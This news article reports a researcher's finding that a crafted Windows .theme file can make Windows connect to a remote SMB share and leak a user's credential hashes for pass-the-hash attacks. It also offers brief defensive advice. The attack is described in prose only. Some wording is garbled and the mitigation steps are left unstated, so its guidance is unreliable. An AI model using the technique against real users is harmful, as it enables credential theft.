Changing your Windows theme seems innocent enough, and it̵
As Bleeping Computer notes, security researcher Jimmy Bayne (@bohops) shows that the process isn’t even difficult. It takes advantage of several Windows behaviors to perform a “pass-the-hash” attack.
In a pass-the-hash attack, bad actors don’t worry about getting your clear text password. They set up an attack that sends them your hashed password. Then they can send that to Microsoft (or the company that the password is for) for authentication. Since it matches correctly, it works the same as using the plain text password.
[Credential Harvesting Trick] Using a Windows .theme file, the wallpaper key can be configured to point to an http / s resource required for remote authentication. When a user activates the topic file (e.g. opened via a link / attachment), the user 1/4 pic.twitter.com/rgR3a9KP6Q will see a Windows logon prompt
– bohops (@bohops) September 5, 2020
As Bayne explains, hackers can modify a Windows design to force the operating system to connect to a remote SMB share that requires authentication. When Windows connects to a remote SMB share like this one, your profile credentials are automatically sent to log in.
Microsoft moved to online accounts with Windows 10 and is slowly pushing everyone to use them. If you’re already using your Microsoft account, it means that your Microsoft username and hash password will be passed to the hacker.
Once the hacker makes the change to a theme, they can save it and upload it to websites that host Windows themes. You won’t know what hit you until it’s too late. Bayne reported the problem to Microsoft, but the company declined to create an update because it was a “feature by design” issue.
Bayne suggested a few solutions, but they broke the Windows thematic component.
Once you’ve done this, you won’t be able to change any themes (until you undo the change). It is safest to enable two-step authentication. If someone steals your password, they still don’t have everything they need to get into your account.
Source: Jimmy Bayne via Bleeping Computer